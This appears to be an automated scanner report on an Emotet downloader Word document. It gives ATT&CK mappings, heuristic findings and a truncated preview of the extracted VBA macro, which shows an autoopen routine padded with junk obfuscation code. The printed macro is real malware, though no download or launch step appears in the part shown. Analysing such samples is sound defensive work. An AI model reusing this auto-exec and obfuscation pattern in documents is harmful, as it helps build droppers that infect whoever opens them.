MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample contains VBA macros, specifically an AutoOpen macro, which is designed to execute automatically. Critical heuristics indicate the use of WMI (Win32_Process.Create) via CreateObject, a common technique for launching malicious processes. ClamAV detection explicitly names this as Emotet, a known downloader family. The VBA code, though partially truncated, contains obfuscated elements and debug print statements, consistent with malware attempting to evade analysis while preparing to download and execute a secondary payload.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13881 bytes |
SHA-256: 017bb8229a09da1384c50ad9bf6e96457e9db2cb2b4065464e6b6a060501258b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "obS7MLYi, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "PiZBUo, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "vd9IwlT0, 2, 2, MSForms, ComboBox"
Function QlFETHQp()
Select Case "sDOrut9"
Case "XH9c9YXX"
Debug.Print "DIHkC0N"
Debug.Print Tan("VkTmi9")
Debug.Print Log("Au8zI3QN")
Debug.Print "z9sIShA"
Debug.Print "miMsjNu"
Debug.Print Tan("Hfdfth")
Case "zp8Q2WO"
Debug.Print Log("bfQRzm")
Debug.Print "ZWzBblY"
Debug.Print Log("ESEcOK")
Debug.Print "iVuJ5H0"
Debug.Print Tan("jOZ4W5")
Debug.Print "MLhmjEiE"
End Select
Select Case "b9UTVNj"
Case "tUdaw3"
Debug.Print "N28jzw7"
Debug.Print Tan("iMtGww")
Debug.Print Log("b7HEjt")
Debug.Print "fuPLj3"
Debug.Print "hIbl_uK"
Debug.Print Tan("NnWb5Ei4")
Case "wncrIP"
Debug.Print Log("DrKitM")
Debug.Print "iU_Rzwt"
Debug.Print Log("FVkspr")
Debug.Print "iE9LbTV"
Debug.Print Tan("Erws5KS")
Debug.Print "L43fJ5W"
End Select
End Function
Sub _
autoopen( _
)
Select Case "p1vtLK"
Case "jENHcKu"
Debug.Print "FBVVEcI"
Debug.Print Tan("EQNdzb")
Debug.Print Log("Nbqs7fJi")
Debug.Print "qArAc_mL"
Debug.Print "ltYmkEF"
Debug.Print Tan("LRw7r6")
Case "kLjLwOv"
Debug.Print Log("VEwN3m")
Debug.Print "ChCEI2a"
Debug.Print Log("jZCEAF")
Debug.Print "u_8V7fn"
Debug.Print Tan("hAi_Vqz")
Debug.Print "UQijUFU"
End Select
sz3Y8w
Select Case "jBRESw"
Case "zMRoIIu"
Debug.Print "VhG6qjww"
Debug.Print Tan("MdiLFV")
Debug.Print Log("AHJtEbu")
Debug.Print "l5Nt0jI"
Debug.Print "Ba8fdQ8"
Debug.Print Tan("JZALTki")
Case "rqdqKk"
Debug.Print Log("vHSR5Z")
Debug.Print "QIsfo4zU"
Debug.Print Log("khhlnOO")
Debug.Print "i8WPXh"
Debug.Print Tan("qcRR_Fj")
Debug.Print "oOj85Iw"
End Select
End Sub
Function m5_ZQ0Sj()
Select Case "mtp7aP"
Case "VfniWjzs"
Debug.Print "f_vf9vh"
Debug.Print Tan("RESTBw")
Debug.Print Log("IF3mUnW6")
Debug.Print "o2wVTU"
Debug.Print "fSPw5YE8"
Debug.Print Tan("FLlsJjom")
Case "OXYlDbvf"
Debug.Print Log("n0KUK6vZ")
Debug.Print "bYJhwts"
Debug.Print Log("Ksr9LaP5")
Debug.Print "YokYiDHB"
Debug.Print Tan("NzOa4a4")
Debug.Print "pUuqwVSE"
End Select
Select Case "v0PU_2M"
Case "ZjoC5Mp"
Debug.Print "ATobnuv"
Debug.Print Tan("UFXLK2Bt")
Debug.Print Log("LsNQ8G6")
Debug.Print "NQKT4O76"
Debug.Print "SfjjBw3"
Debug.Print Tan("UwAK8M")
Case "pCsUtMwK"
Debug.Print Log("oi9O7U")
Debug.Print "woIMdEBm"
Debug.Print Log("NGNGKW")
Debug.Print "AInTwZcj"
Debug.Print Tan("SK3r5CO")
Debug.Print "iknTHDl5"
End Select
End Function
Attribute VB_Name = "wb1vD99K"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Nam
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.